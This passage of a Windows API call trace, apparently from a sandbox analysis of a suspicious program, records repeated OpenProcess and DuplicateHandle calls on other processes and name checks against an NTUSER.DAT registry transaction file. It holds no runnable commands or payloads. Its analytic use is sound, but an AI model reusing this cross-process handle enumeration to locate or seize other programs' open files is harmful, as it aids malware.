DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.292] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.293] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.293] CloseHandle (hObject=0x1e4) returned 1 [0166.293] CloseHandle (hObject=0x194) returned 1 [0166.293] CloseHandle (hObject=0x1e8) returned 1 [0166.293] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0166.293] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.294] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.295] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.295] CloseHandle (hObject=0x1e4) returned 1 [0166.295] CloseHandle (hObject=0x194) returned 1 [0166.295] CloseHandle (hObject=0x1e8) returned 1 [0166.295] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0166.295] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.295] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.296] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.297] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.297] CloseHandle (hObject=0x1e4) returned 1 [0166.297] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.297] CloseHandle (hObject=0x194) returned 1 [0166.297] CloseHandle (hObject=0x1e8) returned 1 [0166.297] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.297] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.298] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.302] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.302] CloseHandle (hObject=0x1e4) returned 1 [0166.302] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.302] CloseHandle (hObject=0x194) returned 1 [0166.302] CloseHandle (hObject=0x1e8) returned 1 [0166.302] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.302] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.303] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.304] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.304] CloseHandle (hObject=0x1e4) returned 1 [0166.304] CloseHandle (hObject=0x194) returned 1 [0166.304] CloseHandle (hObject=0x1e8) returned 1 [0166.304] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.304] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.305] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.306] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.306] CloseHandle (hObject=0x1e4) returned 1 [0166.306] CloseHandle (hObject=0x194) returned 1 [0166.306] CloseHandle (hObject=0x1e8) returned 1 [0166.306] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.306] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.307] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.308] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.308] CloseHandle (hObject=0x1e4) returned 1 [0166.308] CloseHandle (hObject=0x194) returned 1 [0166.308] CloseHandle (hObject=0x1e8) returned 1 [0166.308] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.308] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.309] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.310] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.310] CloseHandle (hObject=0x1e4) returned 1 [0166.310] CloseHandle (hObject=0x194) returned 1 [0166.310] CloseHandle (hObject=0x1e8) returned 1 [0166.310] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.310] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.311] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.315] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.315] CloseHandle (hObject=0x1e4) returned 1 [0166.315] CloseHandle (hObject=0x194) returned 1 [0166.315] CloseHandle (hObject=0x1e8) returned 1 [0166.315] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.315] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.316] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.316] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.317] CloseHandle (hObject=0x1e4) returned 1 [0166.317] CloseHandle (hObject=0x194) returned 1 [0166.317] CloseHandle (hObject=0x1e8) returned 1 [0166.317] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.317] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.318] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.318] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.318] CloseHandle (hObject=0x1e4) returned 1 [0166.318] CloseHandle (hObject=0x194) returned 1 [0166.318] CloseHandle (hObject=0x1e8) returned 1 [0166.318] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.319] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.319] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.320] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.320] CloseHandle (hObject=0x1e4) returned 1 [0166.320] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0166.320] CloseHandle (hObject=0x194) returned 1 [0166.321] CloseHandle (hObject=0x1e8) returned 1 [0166.321] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.321] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.321] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.322] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.322] CloseHandle (hObject=0x1e4) returned 1 [0166.322] CloseHandle (hObject=0x194) returned 1 [0166.322] CloseHandle (hObject=0x1e8) returned 1 [0166.322] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.322] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.322] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.323] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.324] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.324] CloseHandle (hObject=0x1e4) returned 1 [0166.324] CloseHandle (hObject=0x194) returned 1 [0166.324] CloseHandle (hObject=0x1e8) returned 1 [0166.324] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0166.325] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.325] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.326] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.326] CloseHandle (hObject=0x1e4) returned 1 [0166.326] CloseHandle (hObject=0x194) returned 1 [0166.326] CloseHandle (hObject=0x1e8) returned 1 [0166.326] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0166.326] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.327] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.328] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.328] CloseHandle (hObject=0x1e4) returned 1 [0166.328] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.328] CloseHandle (hObject=0x194) returned 1 [0166.328] CloseHandle (hObject=0x1e8) returned 1 [0166.328] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0166.328] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.329] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.330] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.330] CloseHandle (hObject=0x1e4) returned 1 [0166.330] CloseHandle (hObject=0x194) returned 1 [0166.330] CloseHandle (hObject=0x1e8) returned 1 [0166.330] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0166.330] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.331] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.332] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.332] CloseHandle (hObject=0x1e4) returned 1 [0166.332] CloseHandle (hObject=0x194) returned 1 [0166.332] CloseHandle (hObject=0x1e8) returned 1 [0166.332] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0166.332] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.333] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.334] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.334] CloseHandle (hObject=0x1e4) returned 1 [0166.334] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.334] CloseHandle (hObject=0x194) returned 1 [0166.334] CloseHandle (hObject=0x1e8) returned 1 [0166.334] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0166.334] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.335] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.336] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.336] CloseHandle (hObject=0x1e4) returned 1 [0166.336] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.336] CloseHandle (hObject=0x194) returned 1 [0166.336] CloseHandle (hObject=0x1e8) returned 1 [0166.336] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0166.336] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.337] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.338] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.338] CloseHandle (hObject=0x1e4) returned 1 [0166.338] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.338] CloseHandle (hObject=0x194) returned 1 [0166.338] CloseHandle (hObject=0x1e8) returned 1 [0166.338] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0166.338] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.339] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.340] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.340] CloseHandle (hObject=0x1e4) returned 1 [0166.340] CloseHandle (hObject=0x194) returned 1 [0166.340] CloseHandle (hObject=0x1e8) returned 1 [0166.340] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0166.340] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.340] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.341] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.342] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.342] CloseHandle (hObject=0x1e4) returned 1 [0166.342] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.342] CloseHandle (hObject=0x194) returned 1 [0166.342] CloseHandle (hObject=0x1e8) returned 1 [0166.342] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0166.342] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.343] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.344] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.344] CloseHandle (hObject=0x1e4) returned 1 [0166.344] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.344] CloseHandle (hObject=0x194) returned 1 [0166.344] CloseHandle (hObject=0x1e8) returned 1 [0166.344] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0166.344] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.345] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.346] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.346] CloseHandle (hObject=0x1e4) returned 1 [0166.346] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.346] CloseHandle (hObject=0x194) returned 1 [0166.346] CloseHandle (hObject=0x1e8) returned 1 [0166.346] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0166.346] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.346] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.347] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.348] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.348] CloseHandle (hObject=0x1e4) returned 1 [0166.348] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.348] CloseHandle (hObject=0x194) returned 1 [0166.348] CloseHandle (hObject=0x1e8) returned 1 [0166.348] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0166.348] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.348] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.349] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.350] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.350] CloseHandle (hObject=0x1e4) returned 1 [0166.350] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.350] CloseHandle (hObject=0x194) returned 1 [0166.350] CloseHandle (hObject=0x1e8) returned 1 [0166.350] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0166.350] DuplicateHandle (in: 